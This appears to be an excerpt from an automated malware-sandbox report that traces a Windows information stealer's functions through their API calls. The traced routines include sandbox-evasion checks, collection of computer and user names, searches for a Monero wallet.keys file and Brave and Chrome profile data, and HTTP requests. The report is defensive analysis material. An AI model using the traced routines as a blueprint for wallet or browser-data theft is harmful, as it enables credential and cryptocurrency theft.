                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E88B20,?,0048110C,?,00000000,?,00481110,?,00000000,00480AEF), ref: 00476ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00476AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00476AF9
                      • Sleep.KERNEL32(00001770), ref: 00476B04
                      • CloseHandle.KERNEL32(?,00000000,?,00E88B20,?,0048110C,?,00000000,?,00481110,?,00000000,00480AEF), ref: 00476B1A
                      • ExitProcess.KERNEL32 ref: 00476B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated dumps: same set as listed under the first function record above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 2525456742-0
                      • Opcode ID: 5046363cf0ceb7f2e4f8255f45d87da539b2db398f67256c39a366ce81a3c825
                      • Instruction ID: 742608a79b870403eb3756a330a120e347b80ef441d0cd2c14138ee3862e1cad
                      • Opcode Fuzzy Hash: 5046363cf0ceb7f2e4f8255f45d87da539b2db398f67256c39a366ce81a3c825
                      • Instruction Fuzzy Hash: 603132709001086ADB04FBF1DC56BEE7779AF45304F11891FF216A2191EF786915CBAB

                      Control-flow Graph
                      • Function 00461220-0046129D (graph rendered in the interactive report; node and edge list omitted)
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0046123E
                      • __aulldiv.LIBCMT ref: 00461258
                      • __aulldiv.LIBCMT ref: 00461266
                      • ExitProcess.KERNEL32 ref: 00461294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated dumps: same set as listed under the first function record above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3404098578-2766056989
                      • Opcode ID: ff9a2d77535fb552a8c36f702b662037f888bbec635b73683a692d855a7f1839
                      • Instruction ID: bc8b765212fe32282994d1423be4dfb9d525743297d40ac85fa92f2178bd6045
                      • Opcode Fuzzy Hash: ff9a2d77535fb552a8c36f702b662037f888bbec635b73683a692d855a7f1839
                      • Instruction Fuzzy Hash: AE0162B0D40308BADB10EBE1DC49B9EBB78BF04705F24845AE705B62D0E77855458B5E

                      Control-flow Graph
                      • Function 00476ABA-00476B22 (graph rendered in the interactive report; node and edge list omitted)
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E88B20,?,0048110C,?,00000000,?,00481110,?,00000000,00480AEF), ref: 00476ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00476AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00476AF9
                      • Sleep.KERNEL32(00001770), ref: 00476B04
                      • CloseHandle.KERNEL32(?,00000000,?,00E88B20,?,0048110C,?,00000000,?,00481110,?,00000000,00480AEF), ref: 00476B1A
                      • ExitProcess.KERNEL32 ref: 00476B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated dumps: same set as listed under the first function record above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: d47522e6632391298b746ab24530fdf26a7db4c8cb5bc0f247d2fba7843ffde6
                      • Instruction ID: 6c14f6501db86ab282718faab37bdf4372110155683e6fe03c41e9993249bca0
                      • Opcode Fuzzy Hash: d47522e6632391298b746ab24530fdf26a7db4c8cb5bc0f247d2fba7843ffde6
                      • Instruction Fuzzy Hash: C6F03A70940619AAE700FBA09C06BFE7A36EB05705F11D91BB50AA5181CBB86541DA6A

                      Control-flow Graph

                      APIs
                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00464839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00464849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1274457161-4251816714
                      • Opcode ID: cde7b223cd32a68ee27bd217dc637c80077666d85c472035dcafe7cef307a78e
                      • Instruction ID: 9dab5d16d8af7448335e834bd37e259c5521e3eefd2408c3c1fc2ae4290e93b1
                      • Opcode Fuzzy Hash: cde7b223cd32a68ee27bd217dc637c80077666d85c472035dcafe7cef307a78e
                      • Instruction Fuzzy Hash: 082162B1D00209ABDF10DFA5EC45ADE7775FB45310F108629F515A72D0EB706609CF91

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 00466280: InternetOpenA.WININET(00480DFE,00000001,00000000,00000000,00000000), ref: 004662E1
                        • Part of subcall function 00466280: StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 00466303
                        • Part of subcall function 00466280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00466335
                        • Part of subcall function 00466280: HttpOpenRequestA.WININET(00000000,GET,?,00E8DCF8,00000000,00000000,00400100,00000000), ref: 00466385
                        • Part of subcall function 00466280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004663BF
                        • Part of subcall function 00466280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004663D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00475228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: 7403bab59aa73b0d4cf92aed89af4f5e944a161cb7a1fb34b3063da47bf74b53
                      • Instruction ID: 896e2dd4189cd8126bf0b759eff630b8eb30c21325648f3e4a4e93176a2b50f9
                      • Opcode Fuzzy Hash: 7403bab59aa73b0d4cf92aed89af4f5e944a161cb7a1fb34b3063da47bf74b53
                      • Instruction Fuzzy Hash: 1A111F30910008A6CB14FF65DD52AED7338AF90304F50856EF81E4A592EF78AB16CB9A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477910
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00477917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0047792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateComputerNameProcess
                      • String ID:
                      • API String ID: 1664310425-0
                      • Opcode ID: bbb43af43b3f29ec62c5e3168af34b86e64211d4d2d2fd24c44c08d55c34aec7
                      • Instruction ID: 9132e9a31a955ceabc101e0a02199f1b55e802787ef77f08d4cd4c8f35f3f168
                      • Opcode Fuzzy Hash: bbb43af43b3f29ec62c5e3168af34b86e64211d4d2d2fd24c44c08d55c34aec7
                      • Instruction Fuzzy Hash: 0A0162F1944205EBD710DF94DD45BEABBB8FB45B11F10421BE645E2280C37869048BA6
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0046112B
                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00461132
                      • ExitProcess.KERNEL32 ref: 00461143
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: 17a3791e00761e70c07cc8aab7031ae0b122ba0a69d4236031c3e84cb073cd75
                      • Instruction ID: a8dd30ac3f7f829b00f781743728ebe73bf0c8d09c7228f77b934df94537ccdb
                      • Opcode Fuzzy Hash: 17a3791e00761e70c07cc8aab7031ae0b122ba0a69d4236031c3e84cb073cd75
                      • Instruction Fuzzy Hash: 4FE08670945308FFE7507BE09C0AB0D76B8AB05B01F101046F708B61D0D7B83A00DA9A
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004610B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004610F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 1a9bfe55295fc07256170ba773490f6593786c2c22ae7433355f7bb7a15bba13
                      • Instruction ID: 2f124c68603b1d4de921dee1d8858735dbc740883212dda3b8434228d7326fe7
                      • Opcode Fuzzy Hash: 1a9bfe55295fc07256170ba773490f6593786c2c22ae7433355f7bb7a15bba13
                      • Instruction Fuzzy Hash: C8F0E9B1641204BBEB149AA49C49FBBB7D8D705715F305449F504E3390D675AE00CA55
                      APIs
                        • Part of subcall function 004778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00477910
                        • Part of subcall function 004778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00477917
                        • Part of subcall function 004778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0047792F
                        • Part of subcall function 00477850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004611B7), ref: 00477880
                        • Part of subcall function 00477850: RtlAllocateHeap.NTDLL(00000000), ref: 00477887
                        • Part of subcall function 00477850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0047789F
                      • ExitProcess.KERNEL32 ref: 004611C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                      • String ID:
                      • API String ID: 3550813701-0
                      • Opcode ID: 8274b43c9fafe5fd3da977a08e931416a1fa9a7d14c3e41eddd75189dc41bd64
                      • Instruction ID: a3c7826e4654f88fd5526a9bdbb7e047d9e631d9719452a0b0ef3f9f9b7358d6
                      • Opcode Fuzzy Hash: 8274b43c9fafe5fd3da977a08e931416a1fa9a7d14c3e41eddd75189dc41bd64
                      • Instruction Fuzzy Hash: D1E0ECB595420153CB0077F2AC0ABAB339D5B16349F08542FFA0992612FA2DF810C96F
                      APIs
                      • wsprintfA.USER32 ref: 004738CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 004738E3
                      • lstrcat.KERNEL32(?,?), ref: 00473935
                      • StrCmpCA.SHLWAPI(?,00480F70), ref: 00473947
                      • StrCmpCA.SHLWAPI(?,00480F74), ref: 0047395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00473C67
                      • FindClose.KERNEL32(000000FF), ref: 00473C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-2524465048
                      • Opcode ID: 6d057cc3cd765f53f362e0711a6b954cd453dcfaa296e0352f02e6e419430e18
                      • Instruction ID: 3bcc57884fd93d4ac4bf6526b995617f05888a7e48cf9f11caeda3348c01dc10
                      • Opcode Fuzzy Hash: 6d057cc3cd765f53f362e0711a6b954cd453dcfaa296e0352f02e6e419430e18
                      • Instruction Fuzzy Hash: 04A156B19002189BDB64EFA4DC85FFE7379BF45301F04858EA60D96141EB78AB84CF66
                      APIs
                      • wsprintfA.USER32 ref: 0047492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 00474943
                      • StrCmpCA.SHLWAPI(?,00480FDC), ref: 00474971
                      • StrCmpCA.SHLWAPI(?,00480FE0), ref: 00474987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00474B7D
                      • FindClose.KERNEL32(000000FF), ref: 00474B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*$0
                      • API String ID: 180737720-562914289
                      • Opcode ID: 32d4b60214245ea662a4a07d956e5b074ed76079c6c929c62de45db311813cee
                      • Instruction ID: 31a07c8ddfdfed78c3d8a690cc0f6c8e4cab2b9d9b48876522fef77996f6f88e
                      • Opcode Fuzzy Hash: 32d4b60214245ea662a4a07d956e5b074ed76079c6c929c62de45db311813cee
                      • Instruction Fuzzy Hash: 6E6145B1910118ABCB60FBE0DC45EEE737DBB89700F04858EA60D96140EB78EB45CF95
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • FindFirstFileA.KERNEL32(00000000,?,00480B32,00480B2B,00000000,?,?,?,004813F4,00480B2A), ref: 0046BEF5
                      • StrCmpCA.SHLWAPI(?,004813F8), ref: 0046BF4D
                      • StrCmpCA.SHLWAPI(?,004813FC), ref: 0046BF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0046C7BF
                      • FindClose.KERNEL32(000000FF), ref: 0046C7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: 26802c1bb2541936edcb4129cce410d687ddc38100b71fd8cd897250f7681a3b
                      • Instruction ID: 7c097093b20a4a25060bf7b390081e01418f749d162a89b0a8f58037864aa551
                      • Opcode Fuzzy Hash: 26802c1bb2541936edcb4129cce410d687ddc38100b71fd8cd897250f7681a3b
                      • Instruction Fuzzy Hash: C242857190010497CB14FBB1DD96EEE733DAF84304F40855EB90A96191EF38AB59CBAB
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00474580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00474587
                      • wsprintfA.USER32 ref: 004745A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 004745BD
                      • StrCmpCA.SHLWAPI(?,00480FC4), ref: 004745EB
                      • StrCmpCA.SHLWAPI(?,00480FC8), ref: 00474601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0047468B
